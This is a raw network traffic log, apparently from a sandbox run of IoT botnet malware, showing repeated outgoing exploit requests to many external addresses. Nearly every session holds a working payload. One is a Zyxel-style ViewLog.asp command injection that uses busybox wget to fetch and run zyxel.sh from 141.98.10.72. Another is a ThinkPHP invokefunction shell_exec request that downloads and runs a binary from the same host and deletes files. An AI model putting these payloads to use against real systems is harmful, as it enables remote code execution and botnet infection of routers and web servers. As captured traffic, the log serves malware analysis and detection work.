Feb 14, 2024 09:29:34.236304045 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
290	192.168.2.15	45834	95.169.88.179	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:34.247324944 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:34.507988930 CET	349	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/html; charset=utf-8 Content-Length: 130 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
291	192.168.2.15	55214	31.136.218.1	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:34.247469902 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:34.938069105 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:36.282071114 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:39.097970009 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:44.473834991 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:55.225553989 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:16.728761911 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:59.735620022 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
292	192.168.2.15	58604	94.120.211.127	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:34.272536993 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
293	192.168.2.15	54742	31.13.88.49	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:34.329824924 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
294	192.168.2.15	55022	94.126.8.46	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:34.465790033 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:34.707622051 CET	313	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
295	192.168.2.15	52704	94.120.22.103	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:34.519922972 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
296	192.168.2.15	42072	94.123.108.146	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:34.519925117 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
297	192.168.2.15	45218	62.29.25.125	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:34.520081997 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
298	192.168.2.15	51766	94.122.91.190	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:34.521599054 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
299	192.168.2.15	57090	62.29.93.234	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:34.521775961 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
300	192.168.2.15	59404	94.190.214.158	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:34.740346909 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
301	192.168.2.15	48162	95.101.187.61	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:35.282738924 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:35.485419989 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:29:35 GMT Date: Wed, 14 Feb 2024 08:29:35 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 62 36 62 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 33 37 35 26 23 34 36 3b 34 64 65 64 35 65 35 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.6b6b7b5c.1707899375.4ded5e59</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
302	192.168.2.15	43204	95.101.221.66	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:35.298891068 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:35.517512083 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:29:35 GMT Date: Wed, 14 Feb 2024 08:29:35 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 30 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 37 35 26 23 34 36 3b 31 37 30 64 65 39 34 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.600b1502.1707899375.170de946</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
303	192.168.2.15	60372	95.216.160.150	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:35.305382013 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:35.531567097 CET	663	IN	HTTP/1.0 400 Bad Request Date: Wed, 14 Feb 2024 08:29:35 GMT Server: OpenBSD httpd Connection: close Content-Type: text/html Content-Length: 498 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 43 6f 6d 69 63 20 53 61 6e 73 20 4d 53 27 2c 20 27 43 68 61 6c 6b 62 6f 61 72 64 20 53 45 27 2c 20 27 43 6f 6d 69 63 20 4e 65 75 65 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0a 68 72 20 7b 20 62 6f 72 64 65 72 3a 20 30 3b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 64 61 73 68 65 64 3b 20 7d 0a 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 20 7b 0a 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 45 31 46 32 31 3b 20 63 6f 6c 6f 72 3a 20 23 45 45 45 46 46 31 3b 20 7d 0a 61 20 7b 20 63 6f 6c 6f 72 3a 20 23 42 41 44 37 46 46 3b 20 7d 0a 7d 0a 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 4f 70 65 6e 42 53 44 20 68 74 74 70 64 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><title>400 Bad Request</title><style type="text/css">...body { background-color: white; color: black; font-family: 'Comic Sans MS', 'Chalkboard SE', 'Comic Neue', sans-serif; }hr { border: 0; border-bottom: 1px dashed; }@media (prefers-color-scheme: dark) {body { background-color: #1E1F21; color: #EEEFF1; }a { color: #BAD7FF; }}--></style></head><body><h1>400 Bad Request</h1><hr><address>OpenBSD httpd</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
304	192.168.2.15	57698	95.101.14.86	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:35.314522982 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:35.549083948 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:29:35 GMT Date: Wed, 14 Feb 2024 08:29:35 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 37 64 66 33 61 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 37 35 26 23 34 36 3b 31 36 63 66 31 34 31 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.47df3a17.1707899375.16cf1411</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
305	192.168.2.15	45364	31.136.222.23	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:36.323456049 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
